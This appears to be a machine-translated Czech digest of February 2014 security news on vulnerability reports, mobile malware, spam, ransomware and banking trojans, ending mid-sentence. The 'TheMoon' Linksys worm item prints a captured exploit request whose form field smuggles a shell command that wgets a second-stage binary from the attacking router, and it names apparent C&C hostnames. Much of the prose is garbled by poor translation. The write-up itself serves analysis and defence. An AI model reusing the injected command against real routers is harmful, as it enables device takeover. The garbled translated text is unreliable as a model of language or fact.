96 procent z aplikací mají bezpečnostní chyby 28.2.2014 Bezpečnost | Zranitelnosti Zlepšení záplat a bezpečných kódovacích postupů udělali mírný vliv na výskyt slabých míst, podle nové zprávy Cenzic.
Nicméně, vznik BYOD, cloudových služeb a mobilních aplikací - a pokračoval selhání organizací odhalit a řešit využije kolem úniku informací, autentizace a autorizace, a správu sezení se držet zranitelnosti téměř všudypřítomný. Ve skutečnosti, střední počet zranitelností na aplikace - 14 - je ve skutečnosti větší, než tomu bylo v předchozím roce - 13. Zpráva odhalila širokou škálu poznatků, pokud jde o aplikační zranitelnosti, včetně:
Trvalý nárůst výskytu bezpečnostní chyby v mobilních aplikacích. Zpráva zjistila, že porušení soukromí a nadměrné výsady se objeví ve více než 80 procent mobilních aplikací. Zvyšující se výskyt zranitelnosti nalezené v aplikacích sdíleny s třetími stranami. Cloud poskytovatelé služeb a partnery v dodavatelském řetězci, které mohou být mimo sféru organizace vlivu jsou hlavním zdrojem hrozeb dnes. Únik informací je způsobena zranitelných aplikací. Kolem 23 procent zranitelností byly v souvislosti s únikem informací, ve kterém aplikace nevhodně odhaluje citlivá data, jako jsou technické informace o aplikaci nebo data specifická pro uživatele. Problém prastarý of Cross-Site Scripting (XSS) je stále na vině. Některé 25 procent zranitelností byly v souvislosti s cross-site scripting (XSS), ve kterém aplikace umožňuje útočníkům posílat škodlivé skripty předávání skript z jinak důvěryhodné adresy URL. Smíšené zranitelná místa v jiných oblastech, nemůže být ignorována. Nedostatky v ověřování a autorizace tvoří 15 procent zranitelností, a chyby řízení relace tvořily 13 procent. Mnoho z dnešních slabých míst - dokonce i ty, které jsou relativně nové - lze předcházet. Cenzic nastínil některé klíčové osvědčené postupy připomínat podniky některých jednoduchých řešení, která mohou pomoci zabezpečit jejich aplikace: . realizovat bezpečné postupy psaní kódu Jedná se o techniky používané vývojáři aplikací odvrátit potenciální narušení bezpečnosti. Konzistentní, kvalitní kódovací postupy jsou nejúčinnější odrazující prostředek vůči útokům. Použití firewallů pro webové aplikace (Wafs). Wafs umožňuje blokování na základě zásad konkrétních zranitelností, které existují v aplikacích, bez přepisování kódu aplikace. Wafs jsou zvláště efektivní metoda pro rychlé zablokování chybu našel v aplikaci produkce, aniž by bylo nutné plně re-vydání žádosti obsahující zranitelnosti. zajistit správné konfigurace serveru. To je řada postupů pro správu serveru hardwaru, operačních systémů a Osvědčení o bezpečnosti na zařízení se systémem konkrétní aplikaci.
Kaspersky: Mobilní malware se stává podnikáním
27.2.2014 Viry | Mobil Mobilní malware zažívá prudký vzestup. Jak prudký? Bezpečnostní společnost Kaspersky za minulý rok zaznamenala více než 143 tisíc nových modifikací zákeřných programů, jež se zaměřují právě na mobilní zařízení.
Ve stejném roce bylo k šíření malwaru použito 3,9 milionů instalačních balíčků. „Můžeme s jistotou říct, že kyberzločinec už nadále není osamělým jedincem, ale je součástí propracované obchodní operace,“ zmínila společnost na svém blogu. „Už je celkem jasné, že se vyvinulo celé odvětví, jež se soustředí pouze na zisk, což je z funkcí malwaru celkem zřejmé.“
Data společnosti Kaspersky naznačují, že 98 % veškerého mobilního malwaru v roce 2013 bylo zaměřeno na zařízení operačním systémem Android. Toto zjištění je podporováno i novým výzkumem společnosti Cisco.
„Odvětví mobilního malwaru se stále více zaměřuje na efektivnější vydělávání, to znamená převážně na phishing, krádeže údajů o platebních kartách a převod peněz z bankovních karet na mobilní zařízení a z mobilního zařízení do elektronických peněženek zločinců,“ vysvětluje Kaspersky.
„Kyberzločinci se stali touto metodou nelegálního získávání peněz posedlí. Na začátku roku jsme věděli o 67 bankovních trojských koních. Na konci loňského roku už bylo unikátních vzorků takových aplikací 1321.“
Momentálně většina těchto trojských koní ovlivňuje především uživatele z Ruska, kde se odehrává 40,3 % mobilního kyberzločinu. Kaspersky však upozorňuje, že ani lidé z jiných zemí by svou bezpečnost neměli brát na lehkou váhu. „Očekáváme, že mobilní kyberzločin v roce 2014 poroste i v ostatních zemích,“ upozornila společnost.
Nejznámější případy těchto trojských koní jsou třeba Svpeng, který se šíří přes textové zprávy a snaží se ukrást peníze z bankovních účtů. Dále Perkele, malware, který k šíření používá QR kódy, nebo Wroba, jenž nahrazuje bankovní aplikaci na zařízení a krade přihlašovací údaje.
UPS Malware Spam Použití Fake SPF záhlaví 22.2.2014 Viry
"Sender Policy Framework" je jednoduchý systém pro identifikaci, které poštovní servery mohou posílat e-maily jménem vaší domény. Mluvili jsme o tom (a jiné normy, jako je DMARC, DKIM) před.
Tyto systémy jsou obvykle realizovány na svých e-mailových bran. Odchozí brána podepíše e-mail pomocí domény klíč (pro DKIM). Přijímací mailová brána zkontroluje, zda jsou přítomny a správné záhlaví. Mail Gateway se pak přidá speciální hlavičku s výsledkem kontroly, a to speciální hlavička se pak použije spam filtry se rozhodnout, zda zachovat e-mail (nebo ne).
Zdá se, že spammeři se učí a našel způsob, jak oklamat některé špatně nakonfigurované poštovní brány a spam filtry. Spammer přidá hlavičku o tom, že e-mail prošel ověření SPF. William nám poslal vzorek UPS tématickém e-mailu, který obsahoval škodlivý přílohu. To zahrnovalo následující záhlaví:
Předmět: UPS Delivery Notification sledovací číslo: <random řetězec> Datum: Po. 17.únor 2014 11:56:04 -0300 Od: UPS Quantum View <auto-notify@ups.com> X-Priority: 3 X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net) Message-ID: <3b8bfaf8-830d-4804-94fa-96cf3eb3c052@ups.com> Received-SPF: průchod (google.com: doména no-replay@ups.com se jmenuje 192,123. 32.83 jako povolené odesílatele) klient-ip = 192.123.32.83, Received: od 192.123.32.83 (EHLO mailer.ups.com) (192.123.32.83) Received: by mailer.ups.com (Postfix, z userid 1000) id A838D7824B; X-Mailer: MIME-tools 5.41 (Entity 5,404) X-Message-Status: s1: 0 X-SID-PRA: UPS Quantum View <auto@ups.com> X-SID-Výsledek: TempError konverze-S-Loss: ano
Červená čára ukazuje, že e-mail prošel ověření SPF. Nicméně, pokud jste kontrolu záznam UPS.com SPF:
Není tam žádná zmínka o 192.123.32.83. Záhlaví přidala odesílatele, ne přijímací mailové brány. (Budete muset zkontrolovat domén "patří" stejně. Odjíždím jako cvičení pro čtenáře).
Pokud se rozhodnete SPF kontrolu na příjem e-mailu brány, budete muset ujistěte se, že nejprve zbavit všech stávajících SPF záhlaví označující SPF zpracování. V opačném případě odesílatel mohl přidat falešné hlavičky, jako je výše.
Měsíční červ infikuje směrovače Linksys
17.2.2014 Viry Množící se červ nazvaný „The Moon“ napadá směrovače Linkys díky zranitelnosti umožňující obejití ověření.
Podle varování, které ve středu vydalo výzkumné středisko ISC (Internet Storm Center), bylo zaznamenáno nekorektní chování směrovačů Linksys řady E1000 a E1200, které prohledávaly okolní adresy IP na otevřené porty 80 a 8080. O den později ISC potvrdilo, že dané modely mohou být napadeny a že se mu podařilo odchytit aktivního červa pomocí svého honeypotu – úmyslně nechráněnému systému fungujícímu jako vábnička.
Útoky jsou výsledkem červa – sebereplikujícího programu, který napadá systém směrovačů Linksys, které pak používá ke skenování internetu a hledání dalších zranitelných zařízení. Podle Johannese Ullricha, vedoucího technologického pracovníka ISC, prozatím není k dispozici přesný seznam všech zranitelných modelů, ale v závislosti na verzi firmwaru mezi nimi určitě jsou E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000 a E900.
Červ byl pojmenován „The Moon“ protože obsahuje logo Lunar Industrie, fiktivní společnosti z filmu „The Moon“. Jeho útok začíná zadáním adresy URL s příkazy protokolu HNAP (Home Network Administration Protocol), který byl vyvinut společností Cisco a který umožňuje identifikaci, konfiguraci a správu síťových zařízení. The Moon pomocí příkazů HNAP zjistí přesnou verzi modelu a firmwaru daného směrovače a pokud je zařízení zranitelné, pomocí konkrétního skriptu CGI spustí lokální proces.
Název používaného skriptu CGI nebyl uveřejněn, protože umožňuje obejít ověřování. Červ odesílá náhodné přihlašovací údaje, protože je skript vůbec neověřuje a automaticky uznává administrátorská práva klienta. Následuje stažení a spuštění binárního souboru formátu ELF (Executable and Linkable), zkompilovaného pro platformu procesorů MIPS. Kód v souboru obsažený potom prohledává adresy IP na další zařízení a spustí na směrovači server HTTP, ze kterého jsou kopie červa distribuovány na další cíle.
Prozatím není jasné, jaký úkol má malware plnit, některé řetězce v kódu ale naznačují existenci řídícího serveru, který by mohl vznikající botnet ovládat podle nějaké konkrétní strategie. Co se týče obranné strategie, vypnutí vzdálené správy zřejmě u většiny zařízení nebude připadat v úvahu, stejně jako omezení přístupu ke správcovskému rozhraní pouze na ověřenou množinu adres IP. Pro danou verzi červa ovšem stačí změnit číslo portu rozhraní mimo výchozí 80 a 8080, i když samozřejmě nějaká nová verze červa může snadno hledat i na jiných portech. To ovšem na druhé straně znamená více pokusů a větší aktivitu v síti, kterou lze relativně snadno identifikovat.
Firma Linksys, kterou nedávno zakoupila společnost Belkin, si je podle svého mluvčího vědoma zranitelnosti některých řad svých směrovačů a pracuje na novém firmwaru, který by měl chybu odstranit.
Linksys Worm ("TheMoon") Zajatý
13.2.2014 Viry
Jedna důležitá aktualizace: Toto ovlivní další směrovače Linksys stejně. Například, my nějaké směrovače conecting na honeypot kteří se identifikují jako E2500 (Firmware 1.0.03 build 4)
Nakonec naše honeypot to něco, co vypadá, že je zodpovědný za skenování činnost vidíme zachytit:
Původní žádost, jak je popsáno výše, je:
GET / HNAP1 / HTTP/1.1 Host: [ip hostitele]: 8080
Další požadavek je místo, kde to začíná být zajímavé:
submit_button = & change_action = & submit_type = & action = & commit = 0 & ttcp_num = 2 & ttcp_size = 2 & Ttcp_ip =-h `Cd / tmp, pokud [! .-E L26], pak wget http:// [zdroj IP]: 193/0Rx.mid; fi ` & StartEPI = 1 Takže to vypadá, že se bude snažit stáhnout "druhou fázi" z portu 193 z útočícího routeru. Soubor ". L26" Zdá se, že soubor zámek, aby se zabránilo vícenásobné využití.
Jsem srážkové úplnou adresu URL pro teď, dokud můžu zjistit, jestli tam je oprava, nebo jestli je to veřejná / známý využít.
Port Zdá se změní, ale je vždy <1024. Druhá etapa Binární si vždy tři písmena a pak "náhodný" rozšíření.
Zde jsou MD5s některých dvojhvězd jsem načtených tak daleko. Jsou ELF binárky. Pokud by někdo chtěl pomáhat při jejich couvání, prosím, kontaktujte mě na vzorku.
Typ souboru: ELF 32-bit LSB executable, MIPS, na MIPS I verze 1 (SYSV), staticky propojeny, zbavený
Budu aktualizovat tento deník trochu blow-by-ránu, jako i já jsem stále zvrátit části druhé etapy.
- Binární obsahuje sadu těžké kódovaných netblocks (/ 24 a / 21), které by mohly bloky skenuje. - Existují i napevno jména dyndyn.org hostitele. Nejste si jisti, ale to, co oni jsou (C & C?): Azlan281.dyndns.org, littlefrog.dyndns.org, charinalg06.dyndns.org, xplunk.dyndns-home.com a více. - Jen na základě "řetězce", přesto to vypadá, že tam je velení a řízení využití kanálu na zprávu o stavu hostitele. - Seznam uživatelských agentů: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv: 1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1) Mozilla/2.0 (compatible; MSIE 3.0b, Win32) Mozilla/4.0 (compatible; MSIE 4.01, Mac_PowerPC) Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0;. NET CLR 1.0.3705) Mozilla/4.0 (compatible; MSIE 6.0, Win32) WebWasher 3.0 Mozilla/4.0 (compatible; Opera/3.0, Windows 4.10) 3.51 [en] Mozilla/5.0 (compatible; Konqueror/2.2.2, Linux 2.4.14-xfs, X11, i686) Mozilla/5.0 (compatible; SnapPreviewBot, en-US; rv: 1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit / xxx.x (KHTML like Gecko) Safari/12x.x Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv: 1.0.1) Gecko/20030306 Camino/0.7 Opera/9.60 (Windows NT 5.1; U; de) Presto/2.1.1 Opera/9.0 (Windows NT 5.1; U; en) Mozilla/5.0 Galeon/1.0.2 (X11; Linux i686, U ;) Gecko/20011224 Opera/6.x (Linux 2.4.8-26mdk i686, U) [en] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3 Mozilla/5.0 (X11; Linux i686, U, rv: 1.7.13) Gecko/20070322 Kazehakase/0.4.4.1
Rozšíření a mediální typy používané pro druhé fázi souborů:
application / pdf . Pdf image / png image / gif Gif. image / jpeg . Jpg image / bmp . Bmp image / tiff . Tif audio/ac3 . Ac3 audio / asc . Asc audio / ogg . Ogg audio / midi . Mid audio / mpeg . Mpg video / mpeg video / avi . Avi video / raw . Surovin
Binární je spojeno proti OpenSSL, tak C & C kanál použít SSL.
Binární také obsahuje několik obrázků (díky Peter za ukázal, že mimo). Datum vytvoření snímků je 09.5.2013. Zdá se, že loga identifikující autora? Existuje celkem 5 obrázků PNG. 3 smajlíky a 2 loga. Jsem včetně větší loga níže. Existuje celá řada strun s odkazy na "Lunar", "měsíc", "planety", které se zdají být použit jako součást C & C kanálu. Odkaz na "Lunar Industries" a logem Zdá se, že odkaz na film "Moon" http://www.imdb.com/title/tt1182345/
Policie ransomware: mnohamilionové podnikání 12.2.2014 Viry Evropské centrum pro boj proti kyberkriminalitě Europolu zveřejnila své posouzení hrozeb na policejní Ransomware - třídu počítače malware, který viděl exponenciální růst v Evropské unii v posledních dvou letech.
Výsledkem společné iniciativy mezi Evropskou kyberkriminalitě centra (EC3) a nizozemského národního High Tech Crime Unit (NHTCU) se tato zpráva si klade za cíl zvýšit povědomí o ransomware, a také identifikovat příležitosti pro mezinárodní intervence donucovacích orgánů a operativní koordinace. Policie Ransomware je druh online podvody používají zločinci vydírat peníze prostřednictvím nasazení malware. Malware zakáže funkčnost počítačů obětí a zobrazí se zpráva požadující zaplacení výkupného získat přístup ke svým strojům. se Ransomware zprávy za cíl, aby se z donucovacích orgánů, a obviňují oběť provádět on-line činnosti, jako je nelegální soubor sdílení, přístupu k materiálu, zneužívání dětí, nebo navštívit teroristické webové stránky. Zločinci používají skutečné vymáhání práva agentura loga půjčovat autoritu svých zpráv a nutit oběti na zaplacení výkupného, aby odhalili jejich počítačů. Ačkoliv přesný počet obětí policejní ransomware v EU je obtížné posoudit, odhaduje se, že miliony počítačů mají byl napaden a desítky tisíc občanů zaplatil požadavky výkupného. Je milióny euro obchod pro zločince podílejí. Tyto cybercriminal činnosti jsou usnadněny podzemními on-line fóra, které poskytují Ransomware zdrojového kódu, infrastrukturu pro distribuci malwaru a praní špinavých peněz služeb "proplacení z" nedovoleného výnosy získané prostřednictvím on-line předplacené řešení a virtuální měny. . Ransomware "kity" znamená, že útoky mohou být snadno nasazeny a již nejsou omezeny na technicky zdatné Nové formy ransomware se objevují - například Cryptolocker - což může mít ještě větší dopad na jednotlivce a podniky, protože riskují trvalou ztrátu jejich dat a soubory. Počítačoví zločinci se bude rozšiřovat síť obětí zaměřují se na nové trhy, zaměřující se na různé operační systémy a zařízení. distribuce Ransomware herců a infrastruktury v celé řadě právních řízeních komplikuje policejní vyšetřování, a tudíž zlepšení spolupráce a výměna informací mezi donucovacími orgány a soukromými partnery je nezbytné . boj proti počítačové trestné činnosti tohoto jevu Troels Oerting, ředitel Evropského centra pro boj proti kyberkriminalitě řekl: "Malware útoky v podobě ransomware se bohužel zvýší. Je to "dojná kráva" pro trestní podniků, snadné použití a obtížné pro oběti na ochranu proti. Všechny druhy nevinných uživatelů jsou potenciální oběti tohoto trestného činu - a to nejen tradiční uživatelé, ale také podniky a veřejné služby. EC3 bude i nadále pomáhat členským státům EU donucovacím orgánům v boji proti této trestné činnosti a sledování se výnosů z trestné činnosti. Mezitím jsme se všichni musíme zvýšit povědomí mezi všemi uživateli internetu, aby se zabránilo dalšímu dopadu. Je třeba dodržovat několik pravidel - jeden je zajistit, aby jste vždy zálohovaná ".
Šifrované Java Archive trojské bankéři z Brazílie 10.2.2014 Viry
Nikdy jsem si koupil PlayStation a nemá ani můj kolega Micha-san z Japonska - dobře, v jeho případě, alespoň ne z Brazílie. Nicméně, oba jsme obdrželi stejnou upozornění e-mailem:
V tomto případě se zločinci z Brazílie použil nový, ale velmi zvláštní techniku - šíří trojské bankéřů přes Jar. soubory. Říkám divné, protože i když stačí kliknout na jar souboru, nebude fungovat, pokud jste typ ". java-jar filename.jar "v konzoli, ale to nezastavilo brazilské zločinci a dokonce podařilo spoof naše e-mail pasti v Japonsku! Pojďme se podívat do jedné takové Brazilský Java Archive bankéře. První detekce na VT 02.01.2014 13:18:57 0/50 Po rozbalení a demontáž, uvidíte kód šifrované pomocí rozvodny šifry. To je, jak kód vypadá, než to dešifrovat:
Rozvodna nicka rutina je vložen do kódu a to je příklad toho, jak to funguje:
Kompletní tabulka substituovaných znaků je toto: Po dešifrování stejný kód vypadá takto:
Tento malý 14kB. Jar bankéř pracuje jako downloader a je detekován Kaspersky Anti-Virus, jak Trojan.Java.Agent.da
Jakmile se infikuje počítač oběti, vytváří falešný složku, Google Chrome, kam se ukládají nově stažený bankéře z uvedených URL. To také pošle informaci PC oběti na vzdálený server, který je již dole. Proč se zločinci z Brazílie nyní přešel od Delphi Java? Možná je to nová generace zločinci, kteří již dostávají třídy Delphi.
Největší webová stránka ve Švédsku Šíření škodlivého kódu 10.2.2014 Viry
Tento týden byl jeden z nejvíce hektických týdnů po velmi dlouhou dobu, byl jsem pracoval ve dne v noci až do konce vše pro Analyst summitu Kaspersky Security . Nebyl jsem v náladě pro novou práci, protože velmi pozdní a hektické noci. Jsem na cestě ven ze dveří klesat děti a manželku na rodiče místě a najednou zazvoní telefon, jeho Magnus Lindkvist, který byl Security Evangelist společnosti Microsoft ve Švédsku. Je vždy příjemné mluvit s Magnuse, ale tentokrát měl jiný tón, na jeho hlas, byl to opravdu jen pro jakékoliv chit chat, a jen se mě zeptal, jestli jsem byl blízko k počítači. Nálada na něco vzrušujícího najednou jsou jen vrátil ke mně! Byl jsem zpět do hry! :)
Jako bezpečnostní výzkumník, jsem vždy mít alespoň jeden počítač s operačním systémem 24/7, on mi říká, že největší internetové stránky ve Švédsku, Aftonbladet se šíří malware. Rychle jsem se spustit svůj virtuální stroj, spustit Chrome a otevřete webovou stránku. Nic se nestane ... Co jsem zmeškal? Byl Magnus srandu? Pak na druhé straně telefonu slyším Magnus řekl: "Musíte používat Internet Explorer".
Škodlivý reklama, která byla spuštěna v Aftonbladet měl také skript pro kontrolu prohlížeč, pravděpodobně se vyhnout falešné infekcí, a byla vyvolána pouze tehdy, když uživatel spustí aplikaci Internet Explorer. Při návštěvě Aftonbladet a používáte Internet Explorer, budete přesměrováni na jinou webovou stránku, hxxp :/ / [Cut]. Windowsdefence-sn.nl na této stránce statický obraz falešné varování z Microsoft Security Essentials, které mají detekovaných virů na vašem počítači, a je třeba ji opravit. Obraz je opravdu z nástroje Microsoft Security Essentials, ale něco, co se zlí hoši vytvořili vyděsit lidi, že jsou infikované. Jedná se o velmi časté techniky malware spisovatelů. Když kliknete na obrázek, nemusíte nic opravit, můžete skutečně stáhnout soubor škodlivý. Soubor byl popletl Visual Basic spustitelný a je stále předmětem analýzy nás.
Nejprve jsem se ptal sám sebe, je to opravdu důležité? Vzhledem k tomu, že škodlivý reklama byla velmi rychle odstraněna z Aftonbladet, že se nevyužívá žádné zranitelnosti, je to "jednoduché" pokus o sociální inženýrství. Ale myslím, že je to velmi zajímavý a důležitý příběh vyprávět. Většina uživatelů dnes mají dojem, že potřebují k návštěvě pochybné webové stránky nakazit, ale podívejte se na to, co se tady stalo, největší internetové stránky ve Švédsku se šíří malware, ne proto, že dostal hacknutý, ale proto, že někdo s největší pravděpodobností koupil nebo ohrožena reklamy běžící na internetových stránkách. Velké internetové stránky často obsahují obsah z jiných webových stránek, a pokud protivníci ohrozit některou z těchto internetových stránek mohou také manipulovat s obsahem, který je stále součástí velkým stránkách.
V době psaní Nevím přesně, co se škodlivý kód dělá, ale přesto chci všechny varovat o tom! Prosím, mějte svou ochranu až do data! Chci také podpořit Aftonbladet informovat své čtenáře, pokud některý z jejich stránek je infikováno a šíření škodlivého kódu, a ne jen tiše odstranit škodlivý reklamu. To by pomohlo hodně, protože im jistý, že existuje mnoho lidí tam venku, kteří žádají vlastního života, pokud jejich počítač je nakažený, a v případě, že infekce se stále děje.
SpyEye tvůrce přiznává, že 7.2.2014 Viry Aleksandr Andrejevič Panin, ruský národní známý také jako "Gribodemon" a "Harderman," se přiznal ke spiknutí za účelem spáchání drát a bankovní podvody za jeho roli jako primární vývojář a distributor SpyEye bankovnictví Trojan.
Ovládání z Ruska 2009-2011, Panin spikli s ostatními, včetně codefendant Hamza Bendelladj, alžírský občan také známý jako "BX1," rozvíjet, nabízet a prodávat různé verze viru SpyEye a součásti na internetu. Panin povolené cyber zločinci, jak přizpůsobit své nákupy zařadit na míru metody získávání osobní a finanční údaje obětí, stejně jako verze na trh, které se specificky cílené určených finančních institucí. On inzeroval virus SpyEye na on-line, pozvání pouze trestní fórech, a prodával verze viru SpyEye za ceny v rozmezí od $ 1,000 8,500 dolar. On je věřil, že prodal virus SpyEye alespoň 150 "klientů", kteří, v pořadí , používá je nastavit své vlastní velení a řízení (C & C) servery. Jeden z jeho klientů, "Soldier", údajně z více než 3,2 milionu dolarů v období šesti měsíců s použitím viru SpyEye. V únoru 2011 FBI hledal a chytil SpyEye (C & C) serveru údajně provozuje Bendelladj v severní District of Georgia. Tento server řízený přes 200 počítačů infikovaných virem SpyEye a obsahoval informace z mnoha finančních institucí. V červnu a červenci 2011 FBI skryté zdroje komunikovali přímo s Panin, který byl pomocí své on-line přezdívky "Gribodemon" a "Harderman," o SpyEye virus. Zdroje FBI poté zakoupili verzi SpyEye z Panin, které jsou obsaženy prvky, jejichž cílem je ukrást důvěrné finanční informace, zahájit podvodné on-line bankovní transakce, nainstalujte dřevorubci stisků kláves, a iniciovat distribuované odmítnutí služby útoky z počítačů infikovaných malware. Bendelladj byl zadržen na letišti Suvarnabhumi v Bangkok, Thajsko, na 05.01.2013 a byl vydán z Thajska do Spojených států, 2. května 2013. Jeho náklady jsou v současné době probíhá v severní obvod Gruzie. Panin byl zatčen americkými orgány dne 1. července 2013, když letěl přes Hartsfield-Jackson Atlanta mezinárodní letiště. Šetření také vedlo k zatčení čtyř klientů Panin v SpyEye a společníci ve Spojeném království a Bulharsku. Dne 28.ledna 2014, Panin přiznal ke spiknutí za účelem spáchání drát a bankovní podvody. Odsouzení za Panin je naplánováno na 29.dubna 2014. Podle odhadů průmyslu, virus SpyEye napadl více než 1,4 milionu počítačů ve Spojených státech a do zahraničí, a to byl vynikající malware nástrojů používá od přibližně do roku 2009 do roku 2011. Na základě informací obdržených z odvětví finančních služeb základě, se více než 10.000 bankovní účty byly ohroženy infekcí SpyEye jen od roku 2013. Někteří počítačoví zločinci nadále používat SpyEye dnes, ačkoli jeho účinnost byla omezena, neboť tvůrci softwaru přidali SpyEye programů odstranění škodlivého softwaru.
Cílová POS autor malware odhalí 2.2.2014 Viry V neočekávaným vývojem událostí, podezřelý ruský autor BlackPOS (nebo Kaptoxa) potvrdil, že byl skutečně ten, kdo ji vytvořil. Jako připomínka: Výzkumníci z zpravodajského agregátoru InterCrawler Analyzovali měsíce příspěvků na fórech a podzemních byl si jistý, že malware byl vytvořen a uveden do prodeje někým, kdo daboval sám "ree4". Pomocí této informace jako výchozí bod, ale sledoval ho do profilu Vkontakte, který řekl, že jeho jméno bylo Rinat Shabaev, a zdálo se, že být 17-letý z Petrohradu. Jak se ukázalo, byly částečně pravdu - Rinat Shabaev dělal rozvíjet malware, ale není teenager, a on žije v Saratov, hlavního města stejnojmenné ruské regionu . 23-rok-starý Shabaev souhlasil s interview s LifeNews (via Google Translate), ve kterém vysvětlil, že on nepsal malware od nuly, ale pouze přidána funkce pro něj. Tvrdí, že malware nebyl navržen speciálně pro krádež dat, ale jako testovací nástroj pro kontrolu, zda je databáze, která data mají být zaslány, je zranitelný. Přesto připouští, že mohou být použity k trestné činnosti. On také říká, že upravený malware ve spolupráci s jiným hacker, ale říká, že neví, kdo to je, nebo kde bydlí - se s ním setkal na internetu. On nikdy neměla v úmyslu používat aplikaci sám, ale chtěl ji prodat ostatním, kteří by mohli. Na konci, říká, obrátil ji ke svému partnerovi. On je nyní hledají normální, stabilní zaměstnání, dodal.
Malware infikuje Android-běh zařízení přes PC 2.2.2014 Viry | Mobil Vědci nedávno objevili PC trojského koně, jehož konečným cílem je ohrozit Android běžící smartphone u cíle nebo tablet s informačně-krást malware. malware v pochybnost byl nazván Droidpak. Výzkumníci společnosti Symantec se nepodařilo podělit, jak je dodán potenciálních obětí na prvním místě, ale oni vyšťoural, co to dělá. Za prvé, je to klesne škodlivý DLL a zaregistruje jako systémová služba. Pak se dotýká vzdálený server a stáhne konfigurační soubor z něj. Informace v něm obsažené umožňuje, aby v případě potřeby stáhnout škodlivý APK (Android balíčku aplikací) soubor, stejně jako i Android Debug Bridge nástroj. Ten umožňuje malware k instalaci škodlivého APK žádné přístroje založené Android obětí připojí k počítače. Po instalaci malware se snaží skrýt svou přítomnost tím, že předstírá jako "Google App Store" aplikace a na pozadí vyhledává on-line bankovní aplikace, které nainstaloval uživatel. Pokud ji najde, se snaží přesvědčit uživatele k odstranění je to tím, že falešnou záminku a snaží se je přimět ke stažení a instalaci škodlivého ekvivalent. . Netřeba dodávat, že posledně uvedené záznamy jakákoliv (bankovnictví) informace, které se vstoupil do nich Kromě toho, to může také zachytit a mazat SMS zprávy - zaslané bankou oběti jsou pravděpodobně mezi ty, které nejsou povoleny na pop-up. Tento malware kombo je v současné době zaměřuje korejské uživatele, ale to může být snadno upraven tak, aby obhlédli pro on-line bankovních aplikací bank po celém světě, jsem si představit. Dobrou zprávou je, že malware rozhodně potřebuje uživatel provést instalaci škodlivých aplikací , takže uživatelé, kteří jsou ve střehu a vědět, jak rozpoznat tento typ sociálního inženýrství nebudou se zmást to dělá. Další dobrá věc je, že vypnete ladění USB na vašem zařízení se systémem Android bude blokovat tuto infekci vektor ( přečtěte si více o tom, co režim to a proč byste měli držet zakázána, pokud nechcete používat). Konečně, s dobrou AV řešení, jak na vašem PC a váš mobilní přístroj je vždy dobrý nápad.
Při pohledu zpět na 10 let mobilního malwaru 2.2.2014 Mobil | Viry Od Cabir na FakeDefend, poslední desetiletí vidělo číslo mobilního malwaru explodovat. V roce 2013, Fortinet FortiGuard Labs zaznamenala více než 1300 nových škodlivé aplikace denně a je v současné době sleduje více než 300 Android malware rodin a více než 400.000 škodlivé Android aplikací. Kromě naprosté nárůstem počtu, další důležitý trend si uvědomit, je, že mobilní malware následoval stejný vývoj jako PC malware, ale v mnohem rychlejším tempem. Rozšířené přijetí smartphony - a skutečnost, že mohou snadno získat přístup k platební systém (telefonní čísla se zvýšenou sazbou) - z nich dělá snadné cíle, které lze rychle generovat peníze jednou infikován. Navíc mají funkce, jako je geo-umístění, mikrofony , vestavěný GPS a kamery, které všechny umožňují mimořádně dotěrný úroveň špehování jejich vlastníků. Podobně jako počítače malware, mobilní malware rychle se vyvinul do efektivního a účinného způsobu generování hotovosti proud, a zároveň podporuje širokou škálu obchodních modelů. V následujícím chronologie, FortiGuard Labs se zaměřuje na nejvýznamnější mobilní malware v průběhu posledních 10 let, a vysvětluje, jejich role ve vývoji hrozeb. 2004: První pokus Cabir byl svět je první mobilní červ. Navrženy tak, aby infikovat Nokia Series 60, její útok ve slově "Caribe" se objeví na obrazovce infikovaných telefonů. Červ pak šíří se tím, že hledá další zařízení (telefony, tiskárny, herní konzole ...), v těsné blízkosti pomocí funkce Bluetooth telefonu. "Odborníci se domnívají, že červ byl vyvinut skupinou hackerů zvané 29A jako" proof of concept " vzhledem k jeho relativně neškodného charakteru, "řekl Axelle Apvrille, senior mobilní anti-virus výzkumník s Fortinet FortiGuard Labs. 2005: Přidání MMS do mixu CommWarrior, objevil v roce 2005, zvedl kde Cabir skončil tím, že přidá schopnost šířit se pomocí jak Bluetooth a MMS. Po instalaci na zařízení, CommWarrior by se přistupovat ke kontaktním soubor napadeného telefonu a poslat sama prostřednictvím služby MMS dopravce ke každému kontaktu. Použití MMS jako způsob propagace představil ekonomický aspekt, neboť každé zprávy MMS odeslané, majitelé telefonů by vynaložit poplatek z jejich nosiče. Ve skutečnosti, někteří operátoři si říkal, že až 3,5 procenta z jejich provozu byla zdrojů na CommWarrior, a nakonec souhlasila s proplacením oběti. virus, který také zaměřila na Symbian 60 platformu, byla hlášena ve více než 18 zemích po celé Evropě, Asie a Severní Amerika. Celkem mobilní červ infikovaných více než 115.000 mobilních zařízení a poslal více než 450.000 MMS zprávy bez vědomí obětí, osvětlení poprvé, že mobilní Červ může šířit tak rychle jako počítačový červ. "V té době, Symbian byl nejoblíbenější smartphone platformu s desítkami milionů uživatelů po celém světě, "pokračoval Apvrille. "Nicméně, cílem za CommWarrior bylo propagovat sám sebe v co největší míře a ne zisk z poplatků, které vznikly prostřednictvím zpráv MMS." 2006: Po peněz po prokázané úspěchy Cabir a CommWarrior, bezpečnostní komunita zjistil Trojan s názvem RedBrowser vychvalováním několik klíčových rozdílů z jeho předchůdců. První bylo to, že byl navržen tak, aby infikovat telefonu přes Java 2 Micro Edition (J2ME) platformy. Trojan by se prezentovat jako žádost, aby (WAP) stránky procházení Wireless Application Protocol jednodušší. Zaměřením se na všeobecně podporován Java platformu spíše než operační systém zařízení, vývojáři Trojan byli schopni zaměřit mnohem větší publikum, bez ohledu na výrobce telefonu nebo operační systém. Druhý a možná důležitější rozdíl je, že Trojan byl specificky navrženy tak, aby využít Premium Rate SMS služby. Majitel telefonu bude obvykle nebude účtován přibližně $ 5 za SMS -. Další krok směrem k využití mobilního malware jako 